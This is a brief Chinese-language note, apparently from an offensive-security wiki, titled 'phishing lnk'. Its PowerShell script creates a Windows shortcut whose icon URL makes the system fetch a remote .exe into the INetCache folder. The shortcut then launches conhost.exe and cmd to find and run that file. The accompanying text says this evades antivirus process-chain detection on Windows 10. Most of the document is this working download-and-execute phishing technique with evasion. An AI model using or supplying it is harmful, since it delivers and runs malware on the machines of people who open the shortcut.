# 钓鱼lnk

```
$shell = New-Object -ComObject WScript.Shell;
$desktop = [System.Environment]::GetFolderPath('Desktop');
$shortcut = $shell.CreateShortcut("$desktop\qwqdanchun.lnk");
$shortcut.TargetPath = "C:\windows\system32\conhost.exe";
$shortcut.WindowStyle = 7;
$shortcut.Arguments = 'cmd.exe /c cd %USERPROFILE%\AppData\Local\Microsoft\Windows\INetCache & dir /s /B qwqdanchun*.exe | cmd.exe /k';
$shortcut.IconLocation = "https://127.0.0.1/qwqdanchun.exe?.ico";
$shortcut.Save();
```

利用icon缓存来下载文件，并用conhost绕过杀软对进程链的判断。（仅适用于win10，win7等缓存目录不同，有兴趣可以自行编写）

参考文章：

{% embed url="<https://isc.sans.edu/forums/diary/Using+Shell+Links+as+zerotouch+downloaders+and+to+initiate+network+connections/26276/>" %}